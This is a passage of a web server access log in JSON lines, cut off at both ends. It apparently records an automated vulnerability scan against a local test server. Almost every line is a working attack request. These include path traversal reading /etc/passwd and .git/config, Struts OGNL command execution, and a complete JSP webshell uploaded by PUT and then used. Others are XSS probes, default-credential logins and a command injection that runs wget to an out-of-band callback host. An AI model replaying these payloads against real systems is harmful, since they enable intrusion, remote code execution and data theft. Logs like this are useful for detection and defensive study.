AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adm_program/system/redirect.php?url=javascript://%250aalert(document.domain) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.068","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"<%@ page import=\x22java.util.*,java.io.*\x22%>\x0D\x0A<%\x0D\x0Aif (request.getParameter(\x22cmd\x22) != null) {\x0D\x0A out.println(\x22Command: \x22 + request.getParameter(\x22cmd\x22) + \x22
\x22);\x0D\x0A Process p = Runtime.getRuntime().exec(request.getParameter(\x22cmd\x22));\x0D\x0A OutputStream os = p.getOutputStream();\x0D\x0A InputStream in = p.getInputStream();\x0D\x0A DataInputStream dis = new DataInputStream(in);\x0D\x0A String disr = dis.readLine();\x0D\x0A while ( disr != null ) {\x0D\x0A out.println(disr);\x0D\x0A disr = dis.readLine();\x0D\x0A }\x0D\x0A }\x0D\x0A%>\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /poc.jsp/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.065","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webconsole/webpages/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"amty_hidden=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.087","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/bps-backup/logs/db_backup_log.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json///a.4.2.1...json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password=nuclei","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/ieuiMeetingErrorDisplay.jsp%3FErrCode%3D%27%22%3E%3Csvg%2Fonload%3Dalert('29N5mCyJBzeGKiL1K6pTQLZWOop')%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /monitorix-cgi/monitorix.cgi?mode=localhost&graph=all&when=1day HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/svnwebclient/error.jsp?errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/4 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/weathermap/editor.php?plug=0&mapname=poc.conf&action=set_map_properties¶m=¶m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.069","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/diarise/download.php?calendar=file:///etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.119","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/test/test.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.088","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /userportal/webpages/myaccount/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.102","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sell-media-search/?keyword=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /img../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/weathermap/configs/poc.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/svnwebclient/statsItem.jsp?url=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_users/_all_docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"html_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass=bnVjbGVp&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.081","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/easy-media-gallery-pro/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /solr/admin/cores?wt=json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"submitId=debug&debugCmd=wget+http://ca2u0eosmpv1jhs80ca06bwprn8dxdgtn.oast.fun&submitEnd=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.htm HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zenario/admin/welcome.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.187","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /RestAPI/ImportTechnicians HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ghost/preview HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /poc.jsp?cmd=cat+%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.206","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Solar_Menu.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /css../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /super/login.html?lang=en HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fpui/jsp/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/6 